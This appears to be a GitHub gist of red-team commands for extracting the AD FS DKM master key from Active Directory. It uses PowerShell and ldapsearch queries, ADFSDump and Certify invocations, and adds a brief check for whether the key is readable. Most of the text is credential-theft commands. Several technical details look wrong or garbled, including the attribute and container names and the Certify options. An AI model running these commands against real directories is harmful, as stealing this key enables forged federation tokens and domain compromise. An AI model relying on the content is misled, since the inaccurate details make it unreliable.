-
-
Save justaguywhocodes/691b5140cba19f4bf052508d649a8b29 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Commands to test/demonstrate this TTP (testing/red-team purposes only)1. Using PowerShell (AD module) – Recommended for testingpowershell | |
| # Find the AD FS DKM container (one of the two possible locations) | |
| Get-ADObject -Filter { (Name -eq "ADFSSRV") -or (Name -eq "Distributed Key Manager") } -SearchBase "CN=Configuration,DC=contoso,DC=com" -Properties * | |
| # Directly retrieve the DKM master key (new format via KeyCredentialLink) | |
| $dkm = Get-ADObject "CN=ADFSSRV,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=contoso,DC=com" -Properties msDS-KeyCredentialLink | |
| $dkm.msDS-KeyCredentialLink | |
| # Alternative location in newer AD FS versions | |
| $dkm = Get-ADObject "CN=Distributed Key Manager,CN=ADFS,CN=Microsoft,CN=Program Data,DC=contoso,DC=com" -Properties msDS-KeyCredentialLink | |
| $dkm.msDS-KeyCredentialLink | |
| The output will be a binary blob containing the DKM master key in Microsoft's KeyCredential format (new in Windows Server 2016+).2. Using ldapseach (from Windows/Linux with DS tools)bash | |
| # Locate the DKM object | |
| ldapsearch -H ldap://dc01.contoso.com -D "user@contoso.com" -W \ | |
| -b "CN=Configuration,DC=contoso,DC=com" \ | |
| "(|(name=ADFSSRV)(name=Distributed Key Manager))" dn | |
| # Extract the actual key | |
| ldapsearch -H ldap://dc01.contoso.com -D "user@contoso.com" -W \ | |
| -b "CN=ADFSSRV,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=contoso,DC=com" \ | |
| msDS-KeyCredentialLink | |
| 3. Using ADFSDump (public tool by Mandiant/others)powershell | |
| # https://github.com/mandiant/ADFSDump | |
| .\ADFSDump.exe /domain:contoso.com /user:user /password:pass | |
| This tool automates the entire process and outputs the DKM key in usable format.4. Using Certify or SharpADFSDump (Certify has built-in support)powershell | |
| # Certify (SharpChromium/Certify) | |
| Certify.exe find /adfs | |
| Certify.exe adfskey | |
| How to test if you are vulnerable (defensive/blue-team check)Run this as a regular user and see if you can read the key:powershell | |
| try { | |
| $key = (Get-ADObject "CN=ADFSSRV,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=contoso,DC=com" -Properties msDS-KeyCredentialLink -ErrorAction Stop).msDS-KeyCredentialLink | |
| if ($key) { Write-Warning "VULNERABLE: Able to read AD FS DKM master key!" } | |
| } catch { Write-Host "Safe: Access denied" } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment